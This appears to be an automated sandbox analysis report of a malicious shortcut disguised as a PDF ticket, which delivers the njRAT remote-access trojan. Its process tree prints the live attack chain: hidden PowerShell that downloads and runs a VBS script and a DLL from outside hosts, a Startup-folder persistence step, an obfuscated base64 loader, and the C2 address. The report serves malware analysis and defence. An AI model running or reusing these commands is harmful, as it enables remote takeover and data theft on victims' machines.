Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
04-01-2022 07:34
General
-
Target
Electronic Tickets EDC.pdf.lnk
-
Size
2KB
-
MD5
34bdd2618a00931b868b76fa30b0b90a
-
SHA1
7503950b391c35b82c2903d2b6534487d1621d03
-
SHA256
24dd2af82ba220d2f86df039b39c6fd38515d99093a3a42eb54da6af0759969c
-
SHA512
83fa56f79b6ff9203ca9dbed3c2a6f92b38b240ae1215987a86c22302b11c47bd24a57494738e459f3c67c8390716435b9d0a0cedd41f130a2560cb1886444ac
Malware Config
Extracted
http://149.56.200.165/dll/3.txt
Extracted
njrat
0.7NC
NYAN CAT
venomsi.mypsx.net:83
e6bb431cd02
-
reg_key
e6bb431cd02
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies registry class 21 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
-
Suspicious use of AdjustPrivilegeToken 30 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 26 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Electronic Tickets EDC.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget shorturl.at/dmuHK -o $env:public\2.pdf;explorer.exe $env:public\2.pdf; wget rebrand.ly/inkT -o $env:public\1.vbs;explorer.exe $env:public\1.vbs2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Public\2.pdf3⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Public\1.vbs3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\1.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TSW.vbs')3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 104⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Windows\system32\1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TSW.vbs')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1584 -s 20005⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪HQ➠⇗↪ZQBu➠⇗↪C4➠⇗↪ZQB0➠⇗↪DY➠⇗↪LgBh➠⇗↪HM➠⇗↪YQBj➠⇗↪HQ➠⇗↪YQBy➠⇗↪Go➠⇗↪bg➠⇗↪v➠⇗↪EE➠⇗↪UwBB➠⇗↪EM➠⇗↪d➠⇗↪Bh➠⇗↪HI➠⇗↪SgBO➠⇗↪C8➠⇗↪d➠⇗↪Bl➠⇗↪G4➠⇗↪LgBl➠⇗↪HQ➠⇗↪Ng➠⇗↪u➠⇗↪GE➠⇗↪cwBh➠⇗↪GM➠⇗↪d➠⇗↪Bh➠⇗↪HI➠⇗↪agBu➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.ten.et6.asactarjn/ASACtarJN/ten.et6.asactarjn//:ptth'))"4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
MD5
2c512587fe76d851a65649ca26ac881a
SHA14749cbc4086698632ef2c60f52dcc40b6327f65a
SHA256d71fddf0b26e15e2d244eeb9500ce51287e0c5de4cc8604c0a4fb12981f86109
SHA5124606e4894c9fbafa334ff6fb180961768abfed5abcb716a5b7680a2ac8e61b296d40a6440097d214715dadcfbe9714655c2b48f2a2284724b6df93aed82f392b
-
MD5
aefd51e68839f638e1f578c273515394
SHA1a65697b0bf88bb1944a9382df34d65e0ae044c22
SHA2560817160992ae34c68877af995ae8b169f074ada9c101b03c0c075c249b152dbd
SHA51299e61878b17465dd552f78f5be8f8fa68a31c9383cc3dbe9724b6335eabc8c2b4f3f1dd2565c1ffaff24bdf88660d0e674e3b5b86850f50183a8620b22ccc69d
-
MD5
f1143612b89add41d0bb2070108ee638
SHA1f94b10e5941ea379a96fcbbd24c09308d8287a28
SHA256b484541b4616184de3a8ef7423e841ec62a8c858fe7ce1892a94479baafec3ff
SHA51290de21b8e79157e1f4308de7e96aff117494a4be180c35ab4c7b9b2209ffe5547b050ec69b2fd40179f296ed7f9bf3efdf95da9e363a1c39cc0e9fb1b86bf19e
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
136KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
328KB
-
-
-
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
624KB
-
Filesize
5.0MB
-
Filesize
584KB
-
Filesize
5.0MB
-
Filesize
40KB
-
Filesize
408KB